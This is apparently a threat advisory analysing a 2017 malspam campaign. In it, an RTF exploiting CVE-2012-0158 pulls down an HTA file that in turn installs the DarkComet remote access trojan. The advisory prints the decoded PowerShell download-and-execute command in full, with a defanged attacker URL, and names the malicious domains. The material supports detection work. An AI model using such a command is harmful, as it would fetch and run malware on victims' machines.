On October 10th, 2017 malspam delivered a malicious RTF document that tries to exploit Microsoft Office/WordPad via a Buffer Overflow Vulnerability in the ListView / TreeView ActiveX controls in the MSCOMCTL.OCX library, CVE-2012-0158. The malicious code can be triggered by a specially crafted DOC or RTF file for un-patched MS Office products.
VirusTotal Analysis of delivered document confirms presence of RTF exploit.
After opening the document in a vulnerable Microsoft Word application, a connection is established to “shalomreal.com/111.118.180.181” to download a malicious HTA file, which kicks off the following network events.
As shown above, " p4573447474794872248.hta" (VirusTotal and Hybrid-Analysis) was the first download.
This HTA file uses obfuscated code which when rendered creates a PowerShell command. It also creates Shell Object which helps download and execute final payload executable “gd.exe” and has code to close browser window automatically.
Above obfuscated charterer leads to generation of following PowerShell command which uses WebClient object for connectivity:
powershell (new-object System.Net.WebClient).DownloadFile('hXXp://dvayen[.]com/fgg/gd[.]exe', '%temp%\BxQ2QIVm0dfJEQ0XbjTisddC0lm.exe'); Start-Process '%temp%\BxQ2QIVm0dfJEQ0XbjTisddC0lm.exe'", "", "", 0
Once the download is complete, the binary is executed and post-infection traffic started.
Banners in post infection traffic are identified DrakComet RAT banners. VirusToatal Analysis of the payload, “gd.exe”, and Analysis of post infection traffic confirms that it is DarkComet, a Remote Access Trojan (RAT).
Current RSA NetWitness detection populates following meta for the download sessions:
Current RSA NetWitness detection populates following meta for Post Infection traffic:
Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.
